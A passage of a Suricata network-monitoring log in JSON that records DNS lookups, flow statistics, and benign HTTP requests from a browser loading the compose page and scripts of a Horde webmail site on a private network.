op":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42780,"memcap":0}}} {"timestamp":"2020-02-29T00:02:07.265389+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":2}} {"timestamp":"2020-02-29T00:02:10.000572+0000","flow_id":915689860042098,"event_type":"flow","src_ip":"192.168.10.122","src_port":50356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:09.200050+0000","end":"2020-02-28T23:57:09.311909+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:11.927835+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58265,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:02:13.000227+0000","event_type":"stats","stats":{"uptime":13785,"capture":{"kernel_packets":132458,"kernel_drops":0},"decoder":{"pkts":132459,"bytes":91954648,"invalid":179,"ipv4":131034,"ipv6":8,"ethernet":132459,"raw":0,"null":0,"sll":0,"tcp":126049,"udp":4792,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2234,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42773,"memcap":0}}} {"timestamp":"2020-02-29T00:02:14.000230+0000","flow_id":296510195100328,"event_type":"flow","src_ip":"192.168.10.122","src_port":39865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:13.060072+0000","end":"2020-02-28T23:57:13.168011+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:15.188187+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.196007+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6808,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:15.380900+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163}} {"timestamp":"2020-02-29T00:02:15.449100+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17869,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.453845+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:02:15.456055+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} {"timestamp":"2020-02-29T00:02:15.457505+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.456227+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:02:15.460235+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} {"timestamp":"2020-02-29T00:02:15.464545+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.465098+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.465224+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:15.466791+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:02:15.467689+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:02:15.469165+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.469894+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.470165+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.470467+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:02:15.476978+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:02:15.478627+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.513326+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} {"timestamp":"2020-02-29T00:02:15.521234+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} {"timestamp":"2020-02-29T00:02:15.568491+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.568785+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} {"timestamp":"2020-02-29T00:02:15.571258+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":4}} {"timestamp":"2020-02-29T00:02:15.571729+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} {"timestamp":"2020-02-29T00:02:15.573185+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":5}} {"timestamp":"2020-02-29T00:02:15.574651+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.574878+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:02:15.617354+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 